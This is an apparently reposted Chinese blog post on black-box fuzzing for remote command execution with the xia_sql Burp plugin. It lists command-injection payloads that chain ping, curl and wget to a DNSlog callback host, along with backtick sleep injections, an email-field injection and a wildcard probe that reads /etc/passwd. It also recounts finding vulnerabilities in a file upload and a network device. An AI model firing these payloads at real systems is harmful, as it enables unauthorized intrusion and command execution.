准备工作
一、一个插件:https://github.com/smxiazi/xia_sql。有的臭宝要发问了:这不是sqli检测插件吗,跟rce有什么关系。
内心os:wcnmlgbzdsbwywclzmgnzql(有人能完全解读吗)
注意:下载自己burp jdk版本对应的插件
二、几个好用payload
2.1 ping命令---这里可以用这种方式直接组合起来,不管前一个命令是否失败,后面的命令都会执行哟。
;ping ac1s8h4y.eyes.sh|ping ac1s8h4y.eyes.sh&ping ac1s8h4y.eyes.sh
;curl http://ac1s8h4y.eyes.sh|curl http://ac1s8h4y.eyes.sh&curl http://ac1s8h4y.eyes.sh
2.2 sleep命令---使用反引号执行命令
`sleep(5)`
;`sleep(5)`|`sleep(5)`&`sleep(5)`
2.3 邮箱命令注入
`wget ac1s8h4y.eyes.sh`@qq.com
配置插件
将上面的payload填入自定义区域,然后按图中箭头这样勾选,最后一定要点一下加载/重新加载payload哦!
so我们主要利用这个插件给所有的参数插满payload
这样就搞好了,下面像一只猴子一样在网站上到处点点点,尽可能测试所有的功能点,然后看看dnslog平台有木有消息。
文件上传处
xia_sql查看,发现有一个请求包一支独秀,存在很长的延时。
重发数据包进一步确认,延迟成功,漏洞存在。
某网络设备rce
xia_sql配置这个poc:/???/?at /etc/pass??探测到了passwd文件(图找不到了)
回显类探测根据返回包长度差异找到这个数据包
然后于是直接写入文件,poc如下:
原文始发于微信公众号(rainy的安全小屋):黑盒fuzz小技巧之RCE
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论